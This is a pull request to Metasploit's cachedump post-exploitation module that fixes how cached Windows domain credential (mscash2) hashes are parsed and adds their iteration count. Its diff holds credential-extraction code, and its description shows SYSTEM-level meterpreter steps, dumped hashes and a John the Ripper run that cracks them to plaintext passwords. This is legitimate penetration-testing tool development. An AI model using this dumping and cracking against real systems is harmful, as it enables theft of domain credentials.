### PR TITLE
Cachedump module: add iteration count for mscash2 format

### DIFF
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@@ -253,7 +253,7 @@ class MetasploitModule < Msf::Post
 
   def decrypt_hash_vista(edata, nlkm, ch)
     aes = OpenSSL::Cipher.new('aes-128-cbc')
-    aes.key = nlkm[16...-1]
+    aes.key = nlkm[16...32]
     aes.padding = 0
     aes.decrypt
     aes.iv = ch

--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@@ -64,6 +64,15 @@ class MetasploitModule < Msf::Post
     vprint_good "Username\t\t: #{username}"
     vprint_good "Hash\t\t: #{hash.unpack("H*")[0]}"
 
+    if lsa_vista_style?
+      if (s.iterationCount > 10240)
+        iterationCount = s.iterationCount & 0xfffffc00
+      else
+        iterationCount = s.iterationCount * 1024
+      end
+      vprint_good "Iteration count\t: #{s.iterationCount} -> real #{iterationCount}"
+    end
+
     last = Time.at(s.lastAccess)
     vprint_good "Last login\t\t: #{last.strftime("%F %T")} "
 
@@ -152,6 +161,7 @@ class MetasploitModule < Msf::Post
         [
           username,
           hash.unpack("H*")[0],
+          iterationCount,
           logonDomainName,
           dnsDomainName,
           last.strftime("%F %T"),
@@ -168,7 +178,7 @@ class MetasploitModule < Msf::Post
 
     vprint_good "----------------------------------------------------------------------"
     if lsa_vista_style?
-      return "#{username.downcase}:$DCC2$##{username.downcase}##{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
+      return "#{username.downcase}:$DCC2$#{iterationCount}##{username.downcase}##{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
     else
       return "#{username.downcase}:M$#{username.downcase}##{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
     end
@@ -195,6 +205,7 @@ class MetasploitModule < Msf::Post
       :revision,
       :sidCount,
       :valid,
+      :iterationCount,
       :sifLength,
       :logonPackage,
       :dnsDomainNameLength,
@@ -228,7 +239,8 @@ class MetasploitModule < Msf::Post
 
     s.revision = cache_data[40,4].unpack("V")[0]
     s.sidCount = cache_data[44,4].unpack("V")[0]
-    s.valid = cache_data[48,4].unpack("V")[0]
+    s.valid = cache_data[48,2].unpack("v")[0]
+    s.iterationCount = cache_data[50,2].unpack("v")[0]
     s.sifLength = cache_data[52,4].unpack("V")[0]
 
     s.logonPackage  = cache_data[56,4].unpack("V")[0]
@@ -275,6 +287,7 @@ class MetasploitModule < Msf::Post
     [
       "Username",
       "Hash",
+      "Hash iteration count",
       "Logon Domain Name",
       "DNS Domain Name",
       "Last Login",
@@ -319,7 +332,7 @@ class MetasploitModule < Msf::Post
 
       vprint_status("Lsa Key: #{lsakey.unpack("H*")[0]}")
 
-      print_status("Obtaining LK$KM...")
+      print_status("Obtaining NL$KM...")
       nlkm = capture_nlkm(lsakey)
       vprint_status("NL$KM: #{nlkm.unpack("H*")[0]}")
 
@@ -329,7 +342,7 @@ class MetasploitModule < Msf::Post
       john = ""
 
       ok.enum_value.each do |usr|
-        if( "NL$Control" == usr.name) then
+        if ( !usr.name.match(/^NL\$\d+$/) ) then
           next
         end
 


### PR DESCRIPTION
See #8560. In particular, the current John the Ripper format output cannot be cracked with John the Ripper as it is.

Note that the first commit comes from #8578, I will rebased on master once that PR is merged.

I would appreciate some code review since I've never written any Ruby before  :grimacing:

## Extracting the iteration count

Instead of taking the iteration number from the registry `HKEY_LOCAL_MACHINE\SECURITY\Cache\NL$IterationCount` as mentionned in the original issue, I took it from the raw content of the cache for that user (bytes 50 to 52 from the regitry key).

This allows to handle the case where different users have different iteration counts (for example after the `NL$IterationCount` registry key has been changed, if not all previously cached users have been updated).

However, this value has been found by trial and error, and I was not able to find any documentation online. Could someone please check that is works as intended? Paging @gentilkiwi here :wave:

I've confirmed this PR working on:
 * Windows XP (but it uses mscash version 1 format so not applicable to the issue)
 * Windows Vista
 * Windows 7
 * Windows 10

## Verification

1. Use a Windows machine (Vista or later) having joined a domain
2. Set the number of iterations to 20480 (for example):
    - Open a cmd prompt with System privileges (meterpreter, `psexec -s`, etc.)
    - execute the following command: `reg add HKLM\SECURITY\Cache /v NL$IterationCount /t REG_DWORD /d 20`
3. Restart the system
4. Run the module:
   - Get a meterpreter session with System privileges 
   - `run post/windows/gather/cachedump`
   - The module should output the cached hashes with the iteration count beween `$DCC2$` and the following `#`
   - You should be able to crack those with John the Ripper

## Example

```
meterpreter > sysinfo
Computer        : TEST
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : fr_FR
Domain          : LAB
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: AUTORITE NT\Système
meterpreter > run post/windows/gather/cachedump

[*] Executing module against TEST
[*] Cached Credentials Setting:  - (Max is 50 and 0 disables, and 10 is default)
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[*] Obtaining NL$KM...
[*] Dumping cached credentials...
[*] Hash are in MSCACHE_VISTA format. (mscash2)
[*] MSCACHE v2 saved in: /snip/xxx_mscache2.creds_xxx.txt
[*] John the Ripper format:
# mscash2
alice:$DCC2$10240#alice#03a902b80f03c3e4ebed51ff521a02e2::
bob:$DCC2$20480#bob#169826966e84c1a0798c3958f04efdc3::
```
Contents of the CSV file (I've added the `Hash iteration count` column):

```
Username,Hash,Hash iteration count,Logon Domain Name,DNS Domain Name,Last Login,UPN,Effective Name,Full Name,Logon Script,Profile Path,Home Directory,HomeDir Drive,Primary Group,Additional Groups
"Alice","03a902b80f03c3e4ebed51ff521a02e2","10240","","","2017-06-17 22:42:44","","","","","","","","513","33619968"
"Bob","169826966e84c1a0798c3958f04efdc3","20480","","","2017-06-17 22:45:27","","","","","","","","513","33619968 33554432"
```

Notice that the iteration count here for alice (10240) and bob (20480) are not the same: alice has not login since the `HKEY_LOCAL_MACHINE\SECURITY\Cache\NL$IterationCount` has been set to `20`, while bob has.

Now these hashes can be cracked with John the Ripper:

```
$ cat hashes.txt
alice:$DCC2$10240#alice#03a902b80f03c3e4ebed51ff521a02e2::
bob:$DCC2$20480#bob#169826966e84c1a0798c3958f04efdc3::                    
$ cat password.txt
Qwerty123!
F00Bar?                                                                                                                    
$ john hashes.txt --format=mscash2 --wordlist=password.txt
Loaded 2 password hashes with 2 different salts (mscash2, MS Cache Hash 2 (DCC2) [PBKDF2-SHA1 128/128 AVX 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
F00Bar?          (bob)
Qwerty123!       (alice)
2g 0:00:00:00 DONE (2017-06-17 22:51) 18.18g/s 18.18p/s 36.36c/s 36.36C/s Qwerty123!..F00Bar?
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```